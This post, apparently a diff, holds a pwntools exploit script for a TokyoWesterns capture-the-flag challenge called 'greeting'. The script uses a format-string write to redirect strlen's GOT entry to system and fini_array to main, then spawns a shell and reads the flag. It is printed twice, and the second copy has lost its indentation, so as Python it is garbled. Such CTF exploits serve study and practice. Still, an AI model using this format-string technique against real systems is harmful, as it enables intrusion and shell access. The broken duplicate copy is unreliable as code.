wumb0 · September 6, 2016 01:06
diff --git a/greeting.py b/greeting.py
 from pwn import *
 from libformatstr import FormatStr

 context.log_level = 'info'

 e = ELF("./greeting")

 if args.get('REMOTE'):
    r = remote('pwn2.chal.ctf.westerns.tokyo', 16317, timeout=10)
 else:
    r = process(e.path)

 p = FormatStr()
 p[e.sym['__do_global_dtors_aux_fini_array_entry']] = e.sym['main']
 p[e.sym['got.strlen']] = e.symbols['system']
 i = len("Nice to meet you, ")
 buf = p.payload(12, 2, start_len=i)
 log.debug(hexdump(buf))
 log.debug(len(buf))
 log.debug(buf)
 r.sendline(buf)
 log.success("Wrote system onto strlen and main onto fini... trying shell")
 r.sendline('/bin/sh')
 r.recvrepeat(3)
 r.sendline('id')
 if "uid=" in r.recvrepeat(.5):
    log.success("got shell")
    r.sendline('cat flag')
    log.success("Flag: " + r.recv(1024))
 else:
    log.error("Failed... try again")
 r.close()
	from pwn import *
	from libformatstr import FormatStr

	context.log_level = 'info'

	e = ELF("./greeting")

	if args.get('REMOTE'):
	r = remote('pwn2.chal.ctf.westerns.tokyo', 16317, timeout=10)
	else:
	r = process(e.path)

	p = FormatStr()
	p[e.sym['__do_global_dtors_aux_fini_array_entry']] = e.sym['main']
	p[e.sym['got.strlen']] = e.symbols['system']
	i = len("Nice to meet you, ")
	buf = p.payload(12, 2, start_len=i)
	log.debug(hexdump(buf))
	log.debug(len(buf))
	log.debug(buf)
	r.sendline(buf)
	log.success("Wrote system onto strlen and main onto fini... trying shell")
	r.sendline('/bin/sh')
	r.recvrepeat(3)
	r.sendline('id')
	if "uid=" in r.recvrepeat(.5):
	log.success("got shell")
	r.sendline('cat flag')
	log.success("Flag: " + r.recv(1024))
	else:
	log.error("Failed... try again")
	r.close()